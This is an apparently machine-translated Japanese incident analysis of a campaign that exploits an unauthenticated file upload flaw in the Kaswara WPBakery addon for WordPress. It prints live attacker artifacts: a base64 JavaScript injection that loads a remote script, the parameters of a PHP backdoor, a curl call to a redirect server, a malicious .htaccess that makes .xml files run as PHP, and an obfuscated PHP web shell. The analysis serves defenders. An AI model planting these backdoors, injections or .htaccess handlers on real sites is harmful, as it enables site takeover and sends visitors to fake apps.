脆弱なKaswaraモダンWPBakeryページビルダーアドオンプラグインが野生で悪用されている

2021年4月20日に、WPScanの友人が、Kaswara Modern WPBakery PageBuilderAddonsとしても知られるKaswaraModernVCAddonsに深刻な脆弱性があることを報告しました。 Codecanyon / Envatoではもう利用できません。つまり、これを実行している場合は、別の方法を選択する必要があります。

この脆弱性により、認証されていないユーザーがプラグインのアイコンディレクトリ（./wp-content/uploads/kaswara/icons）に任意のファイルをアップロードできます。 これは、WPScanの友人がレポートで共有した最初の侵入の痕跡（IOC）です。

任意のファイルをWebサイトにアップロードする機能により、悪意のあるユーザーがサイトを完全に制御できるようになり、この感染の最終的なペイロードを定義することが困難になります。 したがって、これまでに見つけたすべてのものを紹介します（調査に少し夢中になっているので、読みたくない場合は、IOCセクションにジャンプしてください）。

データベースインジェクション、偽のAndroidアプリ、その他のバックドア

この攻撃で使用されたデータベースインジェクションのフォローアップを指摘してくれたSucuriの友人DenisSinegubkoに感謝します。

悪意のある攻撃者は、「kaswara-customJS」オプションを更新して、Javascriptコードの任意の悪意のあるスニペットを追加します。 これが私たちが見つけた1つの例です：

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

このbase64でエンコードされた文字列は、次のように変換されます。

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

そして、このタイプのスクリプトで通常発生するように、一連の他のJavascriptコードスニペットをチェーンロードし、最終的なペイロードはマルバタイジングまたはエクスプロイトキットのいずれかになります。 これは、Wordfenceがここで報告したものと非常によく似ています。

この場合、スクリプトはhxxp：//double-clickd[。]com/で終了し、不正なコンテンツをロードしていません。 2020年の初めから、疑わしいJavascriptがこのサイトを呼び出しているのを見つけました。そして、2018年以降、人々はすでにこのサイトをブロックしています。

サイトにアップロードされた偽のアプリ

調査したWebサイトで見つかった40個のAndroidアプリは、AliPay、PayPal、Correos、DHLなどのさまざまなアプリの偽のバージョンであり、このVirusTotal分析によると、最も人気のあるアンチウイルスベンダーによって幸運にも検出されていました。

私はアプリの意図を確認しませんでしたが、アプリが要求する権限を簡単に確認することで、アプリで何ができるかを垣間見ることができます。

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

ただし、これらのファイルは、Kaswaraエクスプロイトを使用してすぐにはアップロードされません。 サイトが侵害された後、攻撃者は最初に他のツールをアップロードしてサイトを完全に制御します。

アップロードされたファイル

一部のバックドアやその他のマルウェアも、この脆弱性によって侵害されたWebサイトで見つかりました。 この投稿では、最も人気があり興味深いものの簡単な分析を共有します。 ただし、最初に最も複雑なものに焦点を当てたいと思います。

リダイレクトおよび偽のアプリ

いくつかの侵害されたサイトで見つけた偽のアプリは、Kaswaraの脆弱性を悪用してアップロードされませんでした。 これらは多機能ハックツールを使用してサイトにアップロードされています。これにより、攻撃者はリモートコードをアップロードし（URLまたは文字列を提供することにより）、ユーザーを悪意のあるサイトにリダイレクトできます。

このファイルは、次の文字列が存在することで簡単に識別できますbase64_decode('MTIz');error_reporting(0); 働き

興味深いことに、これ以外のすべてをランダム化します。

マルウェアは1行にあります。これは、このタイプのコード異常を探している場合にも興味深いIOCです。

理解しやすくするために、コードのほとんどの部分をデコードし、興味深い関数の名前を変更して、コードを美化しました。 マルウェアには6つの異なる関数が含まれており、そのうちの5つは$_GET['ts']変数に渡された値に基づいています。 このドキュメントでは、私が見つけた多くのインスタンスの1つであるc.phpについて考えてみましょう。

/c.php?ts=kt

これは何もせず、サイトに500エラーを返すように強制します（後でコードで）。

/c.php?ts=1

$q1aフラグの値をtrueに変更して、コード検証を実行し、攻撃者にOKメッセージを出力します。

この場合、リモートサイトは次のように応答します： {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”コード”＆p = 40bd001563085fc35165329ea1ff5c5ecbdbbeef

$_GET["p"]が123のSHA1チェックサムである限り、$ _ GET $_GET["v"]の内容によって提供されるコードを使用してサーバーにファイルを書き込みますbase64_decode('MTIz') ？thisそのチェックサムです）。

/c.php?ts=tt

サーバーに5MBの「-」を書き込みます。これは、アップロード機能がサーバーで機能するかどうかをテストするために使用される可能性があります。

/c.php?ts=dwm&h=HASH1,HASH2

マルウェアはこの要求を受信すると、アップロードされたファイルがサーバーに正常に書き込まれたかどうかを確認するためのテストを実行します。 それらのMD5ハッシュは既知である必要があり、コンマ区切り値として$_GET['h']変数に送信されます。

/c.php?ts=dw&h=hash&l=URLs_as_CSV

一連のサードパーティのWebサイトからファイルをダウンロードし、ダウンロードしたファイルのmd5の最後の12文字にちなんで名前を付けてサーバーに保存します。

これは、偽のアプリをサーバーにアップロードするために使用されている機能です。

/c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697ファイルをダウンロードするリクエストの例を次に示します。

アクセスのリダイレクト

ktオプションが選択されているか、オプションが選択されていない場合、コードはリダイレクトに進みます。これは、必要なデータを含むJSONBLOBを要求することで実現されます。 次に、ヘッダー関数を使用して訪問者をリダイレクトします。

応答は次のようになります： {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

必要なパラメーターを使用してcURLリクエストを実行する関数は、次のとおりです。

そして、それはこのcURLリクエストに変換できます：

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

最終的なURLは、私がテストできる限り、ランダムですが、人気のあるサービスやアプリの偽のページであるという同じ特徴を共有しています。

wp-content / uploads / kaswara / icons / 16/javas.xmlおよびwp-content/uploads / kaswara / icons / 16 / .htaccess

XMLファイルは通常、潜在的な脅威としてマークされていませんが、この場合、Webサーバーの認識方法を変更する特別に細工された.htaccessファイルがあります。

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

実際、これはApacheに、xml、php、またはpdfを含むjavas、homes、またはmenusファイルをそれに応じて処理および実行されるPHPファイルとして理解するように指示します。 したがって、この.htaccessと同じディレクトリ構造に存在するこれらのファイルはいずれも疑わしいものになります。

javas.xmlファイルは、サイトにアップロードされた他の悪意のあるファイルと同じです。 違いは、ファイルの最後に1行または2行の空白行があるため、従来のハッシュが少し難しいことです。

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

悪意のあるコードは、str_rot13およびbase64でエンコードされた文字列を使用して難読化されます。 また、16進値と数学演算を使用して、文字列をもう少し非表示にします。 POSTリクエストの値に基づいて関数を作成するため、最終的なペイロードは不明です。 ただし、ペイロードは、作成前にmd5チェックに依存しているため、毎回同じように見えます（c42ea979ed982c02632430e9e98a66d6はmd5ハッシュです）。

結論

これは活発なキャンペーンであるため、この投稿を書いている時点で、影響を受けるサイトにさまざまなマルウェアの例がドロップされていることがわかります。 いくつかは私たちがここに持っているものの単なるバリエーションですが、他のものはより深い分析のために十分に興味深いものです。 これらの他の例のいくつかを探索するために、すぐに来るいくつかの小さな投稿を探してください。

これは、拡張機能を最新のセキュリティ修正で更新することの重要性を示しています。 開発者が修正をタイムリーにリリースしない場合、または修正がWordPress.orgリポジトリ（または他のマーケットプレイス）から削除される場合は、より安全な代替手段を見つけることを強くお勧めします。

サイトのマルウェアや脆弱性が心配な場合は、Jetpackのセキュリティ機能を確認してください。 Jetpack Securityは、バックアップ、マルウェアスキャン、スパム保護など、使いやすい包括的なWordPressサイトセキュリティを提供します。

侵入の痕跡

ここに、特定したすべてのIOCの完全なリストがあります。